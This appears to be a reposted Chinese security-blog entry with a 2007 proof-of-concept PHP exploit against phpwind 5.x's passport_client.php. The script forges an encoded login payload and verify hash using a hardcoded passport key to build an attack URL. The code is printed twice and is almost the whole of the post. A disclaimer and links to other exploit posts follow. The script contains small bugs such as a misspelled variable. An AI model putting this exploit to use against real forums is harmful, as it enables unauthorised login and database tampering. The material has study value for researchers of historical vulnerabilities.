phpwind5.x passport_client.php UPDATE SQL Injection POC 's

2017年5月2日19:41:25评论434 views字数 1681阅读5分36秒阅读模式

摘要

by Superhei
Date: 2007-04-08
http://www.ph4nt0m.org

<?
/////////////////////////////////////////////////////
///phpwind5.x passport_client.php UPDATE sql inj POC
///By [email protected]
///thx loulou
///////////////////////////////////////////////
//[fix]:http://www.phpwind.net/read-htm-tid-392683.html
//CODE IN require/defend.php[line 8-15]
//foreach($_GET as $_key=>$_value){
// !ereg("^/_",$_key) && !isset($$_key) && $$_key=$_GET[$_key];
//}
//$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!!
//require_once(D_P.'data/bbscache/config.php');
//if($db_forcecharset && !defined('W_P')){
// @header("Content-Type: text/html; charset=$db_charset");
//}
////////////////////////////////////////////////////
$passwod='123456789';
$passport_key='6f0xuRI8Cd8iga';
$forward=" http://localhost/PHPWind5.0.1/upload/index.php";
$userdb="time=99999999999999999&username=heige111&password=".md5($password);
$userdb= StrCode($userdb,'ENCODE');
$verify=md5($action.$userdb.$forward.$passport_key);
print "passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=".urlencode($forward)."&passport_key=".$passport_key."&verify=".$verify."&userdb=".urlencode($userdb);

function StrCode($string,$action='ENCODE'){
$GLOBALS['db_hash']='6f0xuRI8Cd8iga';
$key = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['db_hash']),8,18);
//$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key]
$string = $action == 'ENCODE' ? $string : base64_decode($string);
$len = strlen($key);
$code = '';
for($i=0; $i<strlen($string); $i++){
$k = $i % $len;
$code .= $string[$i] ^ $key[$k];
}
$code = $action == 'DECODE' ? $code : base64_encode($code);
return $code;
}

by Superhei
Date: 2007-04-08
http://www.ph4nt0m.org
<? ///////////////////////////////////////////////////// ///phpwind5.x passport_client.php UPDATE sql inj POC ///By [email protected] ///thx loulou /////////////////////////////////////////////// //[fix]:http://www.phpwind.net/read-htm-tid-392683.html //CODE IN require/defend.php


//foreach($_GET as $_key=>$_value){
//    !ereg("^/_",$_key) && !isset($$_key) && $$_key=$_GET[$_key]; 
//}
//$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!!
//require_once(D_P.'data/bbscache/config.php');
//if($db_forcecharset && !defined('W_P')){
//    @header("Content-Type: text/html; charset=$db_charset");
//}
////////////////////////////////////////////////////
$passwod='123456789';
$passport_key='6f0xuRI8Cd8iga';
$forward=" http://localhost/PHPWind5.0.1/upload/index.php";
$userdb="time=99999999999999999&username=heige111&password=".md5($password);
$userdb= StrCode($userdb,'ENCODE'); 
$verify=md5($action.$userdb.$forward.$passport_key);
print "passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=".urlencode($forward)."&passport_key=".$passport_key."&verify=".$verify."&userdb=".urlencode($userdb);

function StrCode($string,$action='ENCODE'){ $GLOBALS['db_hash']='6f0xuRI8Cd8iga'; $key = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['db_hash']),8,18); //$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key] $string = $action == 'ENCODE' ? $string : base64_decode($string); $len = strlen($key); $code = ''; for($i=0; $i<strlen($string); $i++){ $k = $i % $len; $code .= $string[$i] ^ $key[$k]; } $code = $action == 'DECODE' ? $code : base64_encode($code); return $code; }

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

phpwind5.x passport_client.php UPDATE SQL Injection POC 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信